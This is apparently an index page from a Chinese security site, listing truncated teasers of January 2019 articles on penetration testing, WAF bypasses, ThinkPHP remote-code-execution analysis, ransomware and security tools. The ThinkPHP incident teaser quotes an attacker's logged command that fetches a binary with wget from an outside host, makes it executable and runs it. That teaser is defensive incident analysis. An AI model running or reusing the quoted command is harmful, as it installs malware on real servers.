渗透测试
最近在乡下,网太慢了,只能玩玩靶机。
任务:获取root权限并且读取/root/flag.txt
安装
直接导入virtualbox即可。
开始
开机就可以看见靶机的IP:192.168.0.104
# nmap -n -v -Pn -p- -A 192.168.0.104 ...
PORT STATE SERVICE REASON VERSION 22/tcp ...
最新
2019年1月30日
阅读 2200
阅读全文
神兵利器
Sitadel实际上是WAScan的升级版,不过是Python版本(>= 3.4)的,这样有助于研究人员根据自己的需要去进行自定义开发,并引入新的功能模块。
目前,Sitadel可实现扩展的功能如下:
前端框架检测;
内容分发网络检测;
定义扫描风险等级;
插件系统;
可使用Docker镜像进行构建和运行;
工具安装
$ git clone https://github.com/shenril/Sitadel.git
$ cd Sitadel
$ ...
2019年1月30日
阅读 2307
阅读全文
渗透测试
事件原由
笔者在写一个小工具,针对渗透测试中需要搜集的信息,使用脚本自动化采集。而在这个模块中有个很难搞的部分就是端口banner 信息搜集,起初我尝试使用了python+nmap+多线程扫描,扫描20+的ip,等的花都谢了。。。而笔者目标是扫描200+的ip。下面我就针对端口扫描的技术进行分析。
1.nmap探测端口
nmap在扫描多个主机的时候可以设置参数 --min-hostgroup ,设置这个参数可以并行扫描多个主机,将这些主机划分成组,然后一次扫描一个组。
栗子
--min-hostgroup 50 nmap 以50个主机为一组,在扫描...
2019年1月24日
阅读 4862
阅读全文
渗透测试
在一次漏洞赏金活动中,挖掘到一个不标准的命令注入漏洞,我无法用命令分隔符、命令替换符注入新命令让系统执行,所以,从”型态”上讲,它不算是命令注入漏洞;但我又可以借助目标环境让载荷到达系统命令行,实现读写文件、执行新命令,所以,”神态”来看,它又像是命令注入。这类借助环境间接注入命令的利用手法,很少在常规讨论命令注入的文章中看到,有必要落笔成文,与你分享。
0×00 酷趣 wargame
由于受赏金厂商保密协议所限,我无法公开原始漏洞详情,但我更清楚 “talk is cheap, show me the code”,耗时费神,找到一个 wargame,相较赏金漏洞,不但体现了相同精髓...
2019年1月24日
阅读 3582
阅读全文
在这篇文章中,您可以获得满足您需求的最佳VPN。
信息是渗透的指明灯。做为一名称职的黑客,要时刻关注国外的最新的讯息,不断学习技能。对于常年跨域搜索的黑客来说,稳定可靠的VPN一种必要的选择。
在此列表中,您可以获得满足您需求的最佳VPN。
NordVPN通过公共网络扩展专用网络,并使用户能够跨个人网络,共享网络或公共网络发送和接收数据。NordVPN已建立了包括美国,欧洲和亚洲在内的全球VPN网络,并很快扩展到更多国家。大多数服务器都可以免费使用,可以随时更改服务器。高速服务器均经过加速优化,实现无掉线稳定连接,自带的...
2019年1月23日
阅读 5852
阅读全文
界内新闻
近日,一款知名软件 ES 文件管理器被曝出有重大漏洞,能够导致用户手机上的文件泄漏给同一网络下的所有用户。据悉ES文件管理器在Google Play上的下载次数已经超过1亿次,用户量非常惊人。
国外安全研究员Elliot Alderson率先在推特上指出了该漏洞。他解释称,每次用户启动该应用时,都会启动http 服务器,在本地会打开端口 59777。通过这个端口,攻击者可以注入JSON有效负载,获得相关用户手机上的文件信息,并且可以直接下载下来。
具体演示视频如下:
庆幸的是,在得知该漏洞之后,ES文件管理器的开发人员很快就修复了这个漏洞...
2019年1月21日
阅读 3388
阅读全文
渗透测试
在这篇文章中,我们会告诉大家如何保护Apache Web服务器免受未经身份验证的用户非法访问,以及如何隐藏关键核心信息不被非法用户查看到。当然了,我们还会介绍如何利用这些安全缺陷来渗透目标服务器,相信这也是大家非常感兴趣的东西。
HTTP基础认证(BA)
在HTTP事务处理环境中,基础访问身份认证是HTTP用户代理在请求提供用户名和密码时需要使用到的一种安全方法。
实际上,HTTP基础认证(BA)是实现对Web资源访问控制的一种最简单的技术,因为它不需要设计cookie、会话识别符或登录页面,HTTP基础认证是需要使用到HTTP头中的标准字段,而且还不需要进...
2019年1月21日
阅读 2072
阅读全文
代码审计
一、概述
12月底,通过安全设备检测到几个不同的IP试图对几个公司内部的网站进行漏洞攻击。通过攻击日志发现攻击IP使用了于2018年12月12日爆出的ThinkPHP远程代码执行漏洞(CNVD-2018-24942),攻击者利用该漏洞,可在未授权的情况下远程执行代码。
下图为攻击日志:
攻击者试图在被攻击服务器上执行如下命令:
‘Cd /tmp;wget http://cnc.junoland.xyz/bins/egg.x86;cat egg.x86> lzrd;chmod 777 lzrd;./lzrd ‘
同时从该恶意文件存放网站上还发现了arm,...
2019年1月21日
阅读 1955
阅读全文
渗透测试
写在前面的话
现在越来越多的数据会存储在Web应用程序里面了,因此Web应用安全的重要性也愈发凸显。在对Web应用程序进行了安全测试之后,我们可以判断其存储的敏感数据是否真的能够实现受限访问,并只允许特定用户对数据执行操作任务。
Web安全测试的范围非常广,其中涉及到多种安全测试过程,从识别整个Web应用程序开始,再到对多个阶段的测试进行监控,它是一个系统化的操作流程。
在本文中,我们将跟大家一起讨论一下在发现和修复Web应用程序中可能存在的安全漏洞时需要注意哪些关键因素。
Web应用程序安全测试
功能测试
在功能测试中,...
2019年1月20日
阅读 1972
阅读全文
神兵利器
前言:
上一篇文章详细讲解 | 利用python开发Burp Suite插件(一)简单介绍了如何配置burpsuite插件开发环境和burp suite插件api的大概用途,详细内容可参考官方手册。今天将利用python实战写一个简单的sql注入插件(实现每个参数后面加入单引号),开发过程我会详细介绍每一个步骤,后续可模仿着,完善插件。
所需要的接口类:
IBurpExtender:
所有插件必须实现这个接口,类名字必须为“BurpExtender”,并且必须提供一个默认构造器”。
IBurpExtender用来在burp上面注册扩展...
2019年1月20日
阅读 2210
阅读全文
渗透测试
在看了bypassword的《在HTTP协议层面绕过WAF》之后,想起了之前做过的一些研究,所以写个简单的短文来补充一下文章里“分块传输”部分没提到的两个技巧。
技巧1 使用注释扰乱分块数据包
一些如Imperva、360等比较好的WAF已经对Transfer-Encoding的分块传输做了处理,可以把分块组合成完整的HTTP数据包,这时直接使用常规的分块传输方法尝试绕过的话,会被WAF直接识别并阻断。
我们可以在[RFC7230]中查看到有关分块传输的定义规范。
4.1. Chunked Transfer Coding
The chunked tra...
2019年1月20日
阅读 3129
阅读全文
代码审计
根据网上发布关于thinkphp 5.x远程代码执行漏洞预警,分析漏洞发生点,对比官方git更新版本,对照发现更新为request类,如下图所示:
观察发生更改的点为pathinfo()、method()、param()、post()、request()和cache()方法上,由此预测漏洞发生可能与这几个方法有关,进入5.0.10版本request.php中,如下图所示:
最后返回一个input方法,跟踪input方法,如下图所示:安全脉搏:https://www.secpulse.com/archives/95012.html
...
2019年1月20日
阅读 2320
阅读全文
渗透测试
前言
什么是序列化和反序列化
Java 提供了一种对象序列化的机制,该机制中,一个对象可以被表示为一个字节序列,该字节序列包括该对象的数据、有关对象的类型的信息和存储在对象中数据的类型。反序列化就是通过序列化后的字段还原成这个对象本身。但标识不被序列化的字段是不会被还原的。
序列化有什么用
1)网站相应的session对象存储在硬盘上,那么保存在session中的内容就必须实现相关的序列化操作。
2)如果使用的java对象要在分布式中使用或者在rmi远程调用的网络中使用的话,那么相关的对象必须实现java序列化接口。
Ja...
2019年1月20日
阅读 2139
阅读全文
渗透测试
前言
MIPS 指令集主要使用在一些嵌入式的 IOT 设备中,比如路由器,摄像头。要对这些设备进行二进制的漏洞挖掘就需要有对 MIPS 有一定的熟悉。MIPS 指令集的栈溢出与 x86 指令集的有所不同,所以漏洞的利用方式也不太相同,但是溢出的思路是一样的:覆盖返回地址、劫持程序控制流、构造 ROP chain 、写 shellcode 等等。本文介绍一下最基本的 MIPS 指令集下的栈溢出的利用方法。
x86 和 MIPS 指令集的差异
1.MIPS 指令系统大量使用寄存器,包括返回地址也是存放在 ra 寄存器中
2.没有堆栈直接操作的指令,...
2019年1月17日
阅读 2737
阅读全文
渗透测试
本文探讨了如何使用未初始化的bash变量来绕过基于正则表达式过滤器和模式匹配的WAF,现在让我们看看它如何在CloudFlare WAF和ModSecurity OWASP CRS3上完成的。
前文回顾
Web应用程序防火墙(WAF)bypass技术(一)
Web应用程序防火墙(WAF)bypass技术(二)
未初始化的变量
在本文中,我将展示一种使用未初始化的bash变量的技术,来绕过基于正则表达式的过滤器和模式匹配。
echo "uninitialized_variable=$uninitialized_variabl...
2019年1月17日
阅读 2454
阅读全文
渗透测试
首先,自我介绍一下。小白一名,2017年才接触Web渗透测试,至于为啥,当然是自己的网站被攻破了……
进入正题,随着安全意思增强,各企业对自己的网站也更加注重安全性。但很多web应用因为老旧,或贪图方便想以最小代价保证应用安全,就只仅仅给服务器安装waf。所以渗透测试过程中经常遇到惹人烦的web应用防火墙,只有突破这第一道防御,接下来的渗透才能顺利进行。本次从协议层面绕过waf实验用sql注入演示,但不限于实际应用时测试sql注入(命令执行,代码执行,文件上传等测试都通用)。
声明:这次实验的思路方法并非自己想出来的,是听了某大牛的公开课总结学习而来。
原理...
2019年1月17日
阅读 2363
阅读全文
渗透测试
前言
Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息。Actuator 配置不当导致应用系统监控信息泄露对应用系统及其用户的危害是巨大的,然而关于 springboot 框架下 actuator 配置不当的漏洞利用分析文章很少,目前笔者只在先知社区看到有一篇介绍 actuator 的安全文章,于是想在这里,分享下笔者在渗透测试过...
2019年1月13日
阅读 3334
阅读全文
渗透测试
0×00 环境搭建
攻击机:kali linux及Windows10(本机)
边缘机:Windows 2003 公网IP:192.168.61.140 内网IP:192.168.129.139
靶机:Windows 2008 内网IP192.168.129.130
0×01 引言
漏洞概述
MetInfo是中国米拓信息技术有限公司的一套使用PHP和Mysql开发的内容管理系统(CMS)。Metinfo 6.0.0版本中存在安全漏洞。远程攻击者可通过向admin/column/save.php文件发送‘module’参数利用...
2019年1月13日
阅读 4439
阅读全文
神兵利器
一、选择Burp Suite插件开发语言
Burp Suite支持Java,Python,Ruby编写他的插件,在这里我们选用Python作为我们插件的开发语言,Python分很多种,常见的比如Jython,Cython等等。今天我们用的是Jython,Jython为我们提供了Python的库,同时也提供了所有java的类。
二、配置Jython环境
我们需要让Burp Suite加载我们的插件,在http://www.jython.org/downloads.html下载2.7.0版本(可下载Standalone独立jar包)。下载好后如下图使Burp Suite加载P...
2019年1月13日
阅读 2624
阅读全文
神兵利器
SCAT是一个由python编写的信令收集和分析工具,它会通过USB解析Qualcomm和Samsung基带的诊断信息,并生成包含蜂窝控制平面消息的GSMTAP数据包流。
安装要求
PC
目前仅在Linux上测试过,且多数为Ubuntu的各种衍生版本。Python版本不得低于python 3,另外还需要安装以下外部模块:
pyUSB
pySerial
要正确解码SCAT生成的GSMTAP数据包,需要Wireshark 2.6.0或更高版本。对于老版本的Wireshark,我们提供了一个Wireshark Lua插件来...
2019年1月12日
阅读 2094
阅读全文
代码审计
漏洞名称
windows任意文件覆盖。
漏洞介绍
安全研究员SandboxEscaper披露Windows操作系统中第四个0-day漏洞的漏洞利用代码,利用该漏洞可以覆盖任意Windows10文件,包括通常无法访问的基本文件,例如SandboxEscaper在POC中给出的pci.sys文件,直接造成系统拒绝服务,当然可以用此方法来关闭第三方杀软,原文如下:
其漏洞发生模块为WER(Windows error report),WER是一个灵活的基于事件的反馈基础架构,用户收集硬件和软件发生问题时进行异常回收,然后发送给Microsoft,并给用户提示合适的异常...
2019年1月12日
阅读 2016
阅读全文
代码审计
前言
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企 业应用开发而诞生的。由于其简单易用,国内用户众多。
2019年1月11日ThinkPHP团队发布了版本更新,本次更新包含了一个可能GetShell的安全更新,具体内容为改进Request类的method方法。
漏洞描述
Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装,默认为$_POST[‘_method’]变量,却没有对$_POST[‘_method’]属性进行严格...
2019年1月12日
阅读 2208
阅读全文
神兵利器
Sodium一个易于使用的可为我们提供加密、解密、签名,密码哈希等功能的软件库。除了自身强大的功能外,它还为我们提供了一个兼容API和一个外部API,以进一步的帮助我们提高其可用性。Sodium的目标是提供构建更高级别加密工具所需的所有核心操作。
Sodium支持跨平台和跨语言, 你可以在各种编译器和操作系统上运行它,包括Windows(使用MinGW或Visual Studio,x86和x86_64),iOS和Android。Javascript和WebAssembly版本也可用并受到完全的支持。
值得一提的是,虽然Sodium的设计着重高安全和易用性,但其整体速度与大多数实现相比...
2019年1月10日
阅读 3783
阅读全文
渗透测试
前言
Facebook 和它的旗下应用 Instagram都是把照片/视频存储在Facebook自身的CDN服务器 “*.fbcdn.net” 或 “*.cdninstagram.com” 之上,然后,再通过其各个子CDN域名网站提供针对请求的内容缓存分发服务。本文中作者分享的是一个针对Facebook CDN服务器的XSS漏洞,利用该漏洞可以绕过链接中的校验机制,任意执行JS代码。
前言
Facebook存储在CDN服务器上的图片和视频,都在自身访问链接中包含了一个HASH串,这个HASH串目的在于对Facebook自身存储的图片或视频起到一个签名校验的保...
2019年1月10日
阅读 1685
阅读全文
神兵利器
前言
近日,深信服EDR安全团队跟踪到多个客户感染了FilesLocker勒索病毒,其中最新版本的已更新到了FilesLocker2.1,这是一个专门为了庆祝圣诞节而设计命名的版本,中招客户除了系统被加密破坏之外,还有来自勒索作者的节日问候。
FilesLocker是一款代理型勒索软件,勒索病毒制造者只负责制作勒索病毒本身,传播方式通过招中间代理的方式来实现,故传播方式多种多样。其中,最新版本的FilesLocker2.1版本最后会在桌面生成中英文的勒索信息提示文件,并弹出勒索窗口。并且还会从https://i.loli.net/2018/12/31/5c29eac523516.bm...
2019年1月10日
阅读 2029
阅读全文